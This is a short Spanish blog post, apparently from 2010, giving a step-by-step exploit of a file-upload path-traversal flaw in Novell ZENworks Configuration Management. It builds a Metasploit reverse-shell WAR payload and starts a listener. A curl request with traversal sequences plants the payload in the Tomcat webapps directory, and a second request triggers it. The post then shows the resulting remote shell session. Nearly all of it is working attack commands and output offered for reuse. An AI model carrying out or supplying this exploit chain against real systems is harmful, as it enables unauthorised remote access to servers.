luser$ ./msfpayload linux/x86/shell_reverse_tcp LHOST=10.31.33.7 LPORT=443 w > shell_reverse_tcp.war
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: LHOST=10.31.33.7,LPORT=443
Listamos el contenido del WAR para conocer e nombre del fichero al que tendremos rlanzar la petición HTTP.
luser$ unzip -l shell_reverse_tcp.war
Archive: shell_reverse_tcp.war
Length Date Time Name
-------- ---- ---- ----
71 04-28-10 22:40 META-INF/MANIFEST.MF
0 04-28-10 22:40 WEB-INF/
285 04-28-10 22:40 WEB-INF/web.xml
1582 04-28-10 22:40 mcyowonbnhrqsyy.jsp
310 04-28-10 22:40 wNaoQNtbYmK.txt
-------- -------
2248 5 files
En otro terminal como root para que se pueda asociar al TCP/443...
root# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.31.33.7 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 10.31.33.7:443
[*] Starting the payload handler...
Subimos el WAR.
luser$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/share/tomcat/webapps&filename=zenw.war&overwrite=true' --data-binary @./shell_reverse_tcp.war -H "Content-Type: application/octet-stream"
Realizamos la petición HTTP para iniciar la shell inversa.
luser$ curl -ivkl 'http://zcm.server/zenw/mcyowonbnhrqsyy.jsp'
Y mágicamente en el terminal con el msfcli nos aparece la conexión.
[*] Command shell session 1 opened (10.31.33.7:443 -> 10.1.2.3:41221)
whoami
zenworks
pwd
/
netstat -putan | grep 443
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 10.1.2.3:41221 10.31.33.7:443 ESTABLISHED 4519/sh
pstree
init─┬─acpid
├─console-kit-dae───63*[{console-kit-dae}]
├─cron
├─dbus-daemon
├─java───17*[{java}]
├─java───39*[{java}]
├─jsvc───jsvc─┬─sh
│ └─78*[{jsvc}]
├─klogd
--
Saludos de #linux, tu canal de script kiddies
No hay comentarios:
Publicar un comentario